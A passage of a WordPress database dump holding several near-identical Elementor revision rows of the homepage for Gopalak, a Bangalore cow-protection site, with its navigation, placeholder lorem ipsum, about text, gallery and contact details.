alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:45:25','2022-10-12 07:15:25','',1373,'https://gopalak.in/?p=1656',0,'revision','',0),(1657,1,'2022-10-12 12:45:25','2022-10-12 07:15:25','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:45:25','2022-10-12 07:15:25','',1373,'https://gopalak.in/?p=1657',0,'revision','',0),(1659,1,'2022-10-12 12:46:45','2022-10-12 07:16:45','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:46:45','2022-10-12 07:16:45','',1373,'https://gopalak.in/?p=1659',0,'revision','',0),(1660,1,'2022-10-12 12:46:45','2022-10-12 07:16:45','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:46:45','2022-10-12 07:16:45','',1373,'https://gopalak.in/?p=1660',0,'revision','',0),(1661,1,'2022-10-12 12:46:45','2022-10-12 07:16:45','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:46:45','2022-10-12 07:16:45','',1373,'https://gopalak.in/?p=1661',0,'revision','',0),(1662,1,'2022-10-12 12:47:07','2022-10-12 07:17:07','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n		